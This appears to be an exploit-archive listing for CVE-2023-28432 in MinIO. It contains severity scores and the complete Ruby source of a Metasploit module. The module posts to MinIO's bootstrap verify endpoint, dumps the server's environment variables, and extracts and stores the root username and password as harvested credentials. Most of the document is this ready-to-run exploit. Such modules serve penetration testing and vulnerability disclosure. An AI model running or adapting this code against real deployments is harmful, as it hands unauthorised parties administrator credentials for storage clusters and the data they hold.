MinIO Bootstrap Verify Information Disclosure

2024-08-3100:00:00

joel [at] ndepthsecurity, RicterZ, metasploit.com

packetstormsecurity.com

minio

object storage

information disclosure

environment variables

security advisory

cve

httpclient

metasploit

json

credentials

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.3

Confidence

Low

EPSS

0.92

Percentile

99.0%

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'MinIO Bootstrap Verify Information Disclosure',  
'Description' => %q{  
MinIO is a Multi-Cloud Object Storage framework. In a cluster deployment starting with  
RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns  
all environment variables, including `MINIO_SECRET_KEY` and `MINIO_ROOT_PASSWORD`,  
resulting in information disclosure.  
  
Verified against MinIO 2023-02-27T18:10:45Z  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'joel @ ndepthsecurity', # msf module  
'RicterZ' # original PoC, analysis  
],  
'References' => [  
[ 'URL', 'https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q'],  
[ 'CVE', '2023-28432']  
],  
'Targets' => [  
[ 'Automatic Target', {}]  
],  
'DisclosureDate' => '2023-03-20',  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [],  
'SideEffects' => [IOC_IN_LOGS]  
}  
)  
)  
register_options(  
[  
Opt::RPORT(9000),  
OptString.new('TARGETURI', [ true, 'The URI of the MinIO Application', '/'])  
]  
)  
end  
  
def report_cred(opts)  
service_data = {  
address: rhost,  
port: rport,  
service_name: 'MinIO',  
protocol: 'tcp',  
workspace_id: myworkspace_id  
}  
  
credential_data = {  
origin_type: :service,  
module_fullname: fullname,  
username: opts['user'],  
private_data: opts['password'],  
private_type: :password  
}.merge(service_data)  
  
login_data = {  
core: create_credential(credential_data),  
status: Metasploit::Model::Login::Status::UNTRIED  
}.merge(service_data)  
  
create_credential_login(login_data)  
end  
  
def run  
vprint_status('Sending Request')  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'minio/bootstrap/v1/verify'),  
'method' => 'POST'  
)  
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?  
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected Response (response code: #{res.code})") unless res.code == 200  
  
json = res.get_json_document  
  
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected JSON Object") unless json.key? 'MinioEnv'  
  
creds = {}  
  
json['MinioEnv'].each do |key, value|  
print_good("#{key}: #{value}")  
creds['user'] = value if key == 'MINIO_ROOT_USER'  
creds['password'] = value if key == 'MINIO_ROOT_PASSWORD'  
end  
  
path = store_loot('minio.env.json', 'application/json', rhost, json, 'minio.env.json', 'MinIO Environmental Variables Json')  
report_cred(creds) if creds.key?('user') && creds.key?('password')  
print_good("MinIO Environmental Variables Json Saved to: #{path}")  
end  
end  
`